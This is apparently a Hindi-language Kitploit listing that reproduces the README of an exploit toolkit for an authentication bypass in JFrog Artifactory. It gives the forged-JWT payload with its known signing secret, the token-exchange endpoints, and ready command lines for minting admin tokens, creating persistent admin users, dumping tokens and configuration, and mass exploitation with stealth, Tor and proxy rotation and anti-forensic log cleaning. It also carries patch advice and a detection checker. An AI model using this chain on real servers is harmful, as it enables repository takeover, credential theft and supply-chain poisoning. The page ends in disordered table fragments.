Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-82329-PoC-Exploit — CVE-2026-82329 के लिए एक्सप्लॉइट और डिटेक्शन टूलकिट, जो JFrog Artifactory ऑथ बायपास है। एडमिन टोकन बनाने के लिए join JWTs को फोर्ज करता है; इसमें एक नॉन-इंट्रूसिव वर्ज़न चेकर शामिल है। | Kitploit
उपकरण/GitHubGitHub/tc4dy/cve-2026-82329-poc-exploit
रक्षात्मक उपकरणभेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनासुरक्षा वर्चुअलाइजेशनपेनिट्रेशन टेस्टिंगप्रमाणीकरण

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रेड टीमिंग
GitHubtc4dy/cve-2026-82329-poc-exploit

CVE-2026-82329-PoC-Exploit

CVE-2026-82329 के लिए एक्सप्लॉइट और डिटेक्शन टूलकिट, जो JFrog Artifactory ऑथ बायपास है। एडमिन टोकन बनाने के लिए join JWTs को फोर्ज करता है; इसमें एक नॉन-इंट्रूसिव वर्ज़न चेकर शामिल है।

रिपॉजिटरी देखें
10घं 35मि पहलेअभी तक समीक्षित नहीं
साझा करें

CVEPoC

CVE‑2026‑82329 – JFrog Artifactory प्रमाणीकरण बायपास टूलकिट

Python 3.8+ CVSS Author Artifactory

केवल नैतिक उपयोग हेतु – अधिकृत सुरक्षा परीक्षण
यह रिपॉज़िटरी केवल अधिकृत सुरक्षा पेशेवरों, ब्लू टीमों और पेनेट्रेशन टेस्टरों के लिए उपकरण प्रदान करती है।
कंप्यूटर सिस्टम तक अनधिकृत पहुँच CFAA (US), Computer Misuse Act (UK), TCK 243/244 (Turkey), और दुनिया भर के समान कानूनों के तहत अवैध है।


📖 भेद्यता अवलोकन

CVE‑2026‑82329 स्व-होस्टेड JFrog Artifactory (संस्करण से तक) में एक गंभीर प्रमाणीकरण बायपास भेद्यता है, जो एक अनधिकृत हमलावर को JFrog Access क्लस्टर जॉइन तंत्र का दुरुपयोग करके प्राप्त करने की अनुमति देती है।

7.111.x
7.161.x
पूर्ण प्लेटफ़ॉर्म प्रशासक टोकन

यह कैसे काम करता है

  1. रिक्त जॉइन कुंजी विश्वास – JFrog Access एक फैंटम जॉइन कुंजी पर भरोसा करता है जिसका मान एक खाली स्ट्रिंग है। इसलिए इसका साइनिंग सीक्रेट नियतात्मक मान 32 * 0x20 (स्पेस) है।
  2. नकली जॉइन JWT – एक हमलावर इस ज्ञात सीक्रेट और kid = SHA256("") से हस्ताक्षरित एक HS256 JWT को नकली बनाता है।
  3. SERVICE टोकन जारी – POST /access/api/v1/registry/join बिना किसी प्रमाणीकरण के scp=admin के साथ एक SERVICE टोकन लौटाता है।
  4. एडमिन टोकन एक्सचेंज – scope=applied-permissions/admin&audience=* के साथ POST /access/api/v1/tokens एक पूर्ण प्लेटफ़ॉर्म एडमिन टोकन देता है।
  5. प्रभाव – पूर्ण रिपॉज़िटरी टेकओवर, टोकन चोरी, एडमिन उपयोगकर्ता निर्माण, आर्टिफैक्ट ज़हरीकरण, सप्लाई-चेन हमले, और जुड़े सेवाओं (Xray, Mission Control, Distribution) में पार्श्व गति। तुरंत अपग्रेड करें!

प्रभावित संस्करण

  • 7.111.4 – 7.111.20 – भेद्य
  • 7.117.0 – 7.117.27 – भेद्य
  • 7.125.0 – 7.125.19 – भेद्य
  • 7.133.0 – 7.133.28 – भेद्य
  • 7.146.0 – 7.146.36 – भेद्य
  • 7.161.0 – 7.161.19 – भेद्य

पैच

  • 7.111.21, 7.117.28, 7.125.20, 7.133.29, 7.146.38, या 7.161.20 या नए संस्करण में अपग्रेड करें।
  • यदि अपग्रेड संभव नहीं है, तो Artifactory तक नेटवर्क पहुँच प्रतिबंधित करें (इसे कभी इंटरनेट पर उजागर न करें) और अस्थायी उपाय के रूप में सभी एडमिन टोकन रोटेट करें।

🧰 उपकरण

उपकरणउद्देश्यइच्छित उपयोगकर्ता
exploit.pyJWT फोर्जिंग, एडमिन टोकन एक्सचेंज, एडमिन उपयोगकर्ता निर्माण, मास स्कैनिंग, स्टील्थ मोड, प्रॉक्सी रोटेशन, इंटरैक्टिव मेनू, और पूर्ण हमला श्रृंखला के साथ पूर्ण हथियारबंद टूलकिट।रेड टीमें / अधिकृत पेंटेस्टर
safechecker.pyगैर-घुसपैठिया भेद्यता चेकर जो Artifactory संस्करण का पता लगाता है, एक्सपोज़र को मान्य करता है, और बिना कोई टोकन प्राप्त किए या कोई पेलोड निष्पादित किए जोखिम का आकलन करता है। JSON रिपोर्ट उत्पन्न करता है।ब्लू टीमें / सुरक्षा ऑडिटर

📊 विशेषता तुलना

विशेषताexploit.pysafechecker.py
भेद्यता का पता लगाना✅✅
संस्करण का पता लगाना✅✅
नकली जॉइन JWT✅❌
सर्विस टोकन मिंट✅❌
एडमिन टोकन एक्सचेंज✅❌
एडमिन उपयोगकर्ता निर्माण✅❌
रिपॉज़िटरी सूचीबद्ध करें✅❌
उपयोगकर्ता सूचीबद्ध करें✅❌
कॉन्फ़िगरेशन डंप करें✅❌
टोकन डंप करें✅❌
पूर्ण हमला श्रृंखला✅❌
इंटरैक्टिव मेनू✅❌
मास स्कैनिंग (मल्टी-थ्रेड)✅✅
प्रॉक्सी समर्थन✅✅
प्रॉक्सी रोटेशन✅❌
Tor समर्थन (गुमनामी)✅❌
User‑Agent रोटेशन (OPSEC)✅❌
जिटर (OPSEC)✅❌
अनुकूली दर सीमक✅❌
गैर-घुसपैठिया (सुरक्षित) मोड❌✅
संस्करण रिपोर्ट✅✅
अनाम पहुँच जाँच❌✅
JSON रिपोर्ट✅✅

🎯 उपयोग केस सारांश

परिदृश्यअनुशंसित उपकरण
ब्लू टीम – यह सत्यापित करना कि आपका Artifactory भेद्य है या नहींsafechecker.py
सुरक्षा ऑडिट – गैर-घुसपैठिया भेद्यता मूल्यांकनsafechecker.py
रेड टीम – पूर्ण शोषण के साथ अधिकृत पेनेट्रेशन परीक्षणexploit.py
बग बाउंटी – जिम्मेदार प्रकटीकरण परीक्षणsafechecker.py
मास स्कैनिंग – भेद्यता के लिए कई लक्ष्यों की जाँचexploit.py (केवल-पहचान)
घटना प्रतिक्रिया – यह जाँचना कि सिस्टम से समझौता हुआ है या नहींsafechecker.py

⚙️ स्थापना

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-82329-PoC-Exploit
cd CVE-2026-82329-PoC-Exploit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
curl_cffi

📋 पैरामीटर

exploit.py पैरामीटर

पैरामीटरविवरण
-u, --urlएकल लक्ष्य Artifactory URL (जैसे http://artifactory.example.com:8082)
-f, --fileमास स्कैनिंग के लिए लक्ष्यों की सूची वाली फ़ाइल (प्रति पंक्ति एक)
--create-adminस्थायी एडमिन उपयोगकर्ता बनाएँ (प्रारूप: USER:PASS)
--keep-adminबनाए गए एडमिन उपयोगकर्ता को रखें (स्कैन के बाद सफ़ाई न करें)
--token-onlyकेवल एडमिन टोकन प्रिंट करें (एकल लक्ष्य)
--interactiveशोषण के बाद इंटरैक्टिव मेनू
--service-idजॉइन JWT के लिए सर्विस ID (डिफ़ॉल्ट: jfrt@01)
-t, --threadsमल्टी-टार्गेट के लिए थ्रेड्स की संख्या (डिफ़ॉल्ट: 10)
--timeoutअनुरोध टाइमआउट (डिफ़ॉल्ट: 25s)
--retryअधिकतम पुनः प्रयास (डिफ़ॉल्ट: 3)
--proxyHTTP/HTTPS प्रॉक्सी (जैसे http://127.0.0.1:8080)
--proxy-listरोटेशन के लिए प्रॉक्सी वाली फ़ाइल (प्रति पंक्ति एक)
--jitterअनुरोधों के बीच यादृच्छिक जिटर (0‑2 सेकंड)
--stealthस्टील्थ मोड सक्षम करें (UA रोटेशन + X‑Forwarded‑For)
--curl-cffiTLS फिंगरप्रिंट प्रतिरूपण के लिए curl_cffi का उपयोग करें
--fullपूर्ण हमला: सभी मॉड्यूल
--dump-configसिस्टम कॉन्फ़िगरेशन डंप करें
--dump-tokensसभी एक्सेस टोकन डंप करें
--list-reposरिपॉज़िटरी सूचीबद्ध करें
--list-usersउपयोगकर्ता सूचीबद्ध करें
--detectकेवल पहचान (कोई एडमिन टोकन एक्सचेंज नहीं)

safechecker.py पैरामीटर

पैरामीटरविवरण
-u, --urlएकल लक्ष्य Artifactory URL (जैसे http://artifactory.example.com:8082)
-f, --fileलक्ष्यों की सूची वाली फ़ाइल (प्रति पंक्ति एक)
-t, --threadsमल्टी-टार्गेट के लिए थ्रेड्स की संख्या (डिफ़ॉल्ट: 5)
--timeoutअनुरोध टाइमआउट (डिफ़ॉल्ट: 10s)
-v, --verboseविस्तृत आउटपुट
-o, --outputJSON रिपोर्ट फ़ाइल में सहेजें

💥 परिदृश्य

#परिदृश्यकमांड
1त्वरित भेद्यता जाँचpython safechecker.py -u http://artifactory.example.com:8082
2रिपोर्ट के साथ विस्तृत स्कैनpython safechecker.py -u http://artifactory.example.com:8082 -o report.json -v
3फ़ाइल से मास ऑडिटpython safechecker.py -f targets.txt -t 10 -o audit.json
4केवल-पहचान शोषणpython exploit.py -u http://artifactory.example.com:8082 --detect
5केवल एडमिन टोकन प्राप्त करेंpython exploit.py -u http://artifactory.example.com:8082 --token-only
6इंटरैक्टिव मेनू के साथ पूर्ण हमलाpython exploit.py -u http://artifactory.example.com:8082 --interactive
7स्थायी एडमिन उपयोगकर्ता बनाएँpython exploit.py -u http://artifactory.example.com:8082 --create-admin evil:P@ssw0rd1 --keep-admin
8कॉन्फ़िगरेशन डंप करेंpython exploit.py -u http://artifactory.example.com:8082 --dump-config
9रिपॉज़िटरी और उपयोगकर्ता सूचीबद्ध करेंpython exploit.py -u http://artifactory.example.com:8082 --list-repos --list-users
10स्टील्थ के साथ मास शोषणpython exploit.py -f targets.txt -t 20 --stealth --jitter --full -o results.json
11Tor के साथ प्रॉक्सी रोटेशनpython exploit.py -f targets.txt --proxy-list proxies.txt --curl-cffi --stealth

🧪 एंडपॉइंट और शोषण श्रृंखला

एक्सप्लॉइट निम्नलिखित JFrog एंडपॉइंट और शोषण चरणों का उपयोग करता है:

चरणविधिएंडपॉइंटविवरण
1. जॉइनPOST/access/api/v1/registry/joinनकली HS256 JWT → SERVICE टोकन (scp=admin)
2. एक्सचेंजPOST/access/api/v1/tokensSERVICE टोकन → प्लेटफ़ॉर्म एडमिन टोकन
3. प्रमाणGET/artifactory/api/system/configurationपहुँच का एडमिन-केवल प्रमाण
4. बनाए रखेंPUT/artifactory/api/security/users/{user}स्थायी एडमिन उपयोगकर्ता बनाएँ
5. रद्द करेंDELETE/access/api/v1/tokens/{id}बनाए गए टोकन की सफ़ाई

पेलोड प्रारूप

root@kitploit:~
# Forged join JWT structure
{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "iat": <unix_timestamp>,
  "service_id": "jfrt@01",
  "kid": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
  "skip_node_registration": true
}

# Signing secret
secret = b"\x20" * 32

# Admin token request
scope=applied-permissions/admin&audience=*&expires_in=0&refreshable=false

🛡️ जिम्मेदार उपयोग

  • इन उपकरणों का उपयोग केवल उन सिस्टम पर करें जिनका आप स्वामित्व रखते हैं या जिनका परीक्षण करने के लिए आपके पास स्पष्ट लिखित अनुमति है।
  • अनधिकृत पहुँच अवैध और अनैतिक है।
  • लेखक किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं हैं।
  • हमेशा अपने देश के कानूनों और विनियमों का पालन करें।

यह सॉफ़्टवेयर केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।

टूल डाउनलोड करें
लॉग सफ़ाई (एंटी-फोरेंसिक)
✅
❌
कस्टम User‑Agent✅✅
SSL सत्यापन नियंत्रण✅✅
--exploitपूर्ण शोषण करें
-o, --outputJSON रिपोर्ट फ़ाइल में सहेजें
-v, --verboseविस्तृत आउटपुट
-q, --quietशांत मोड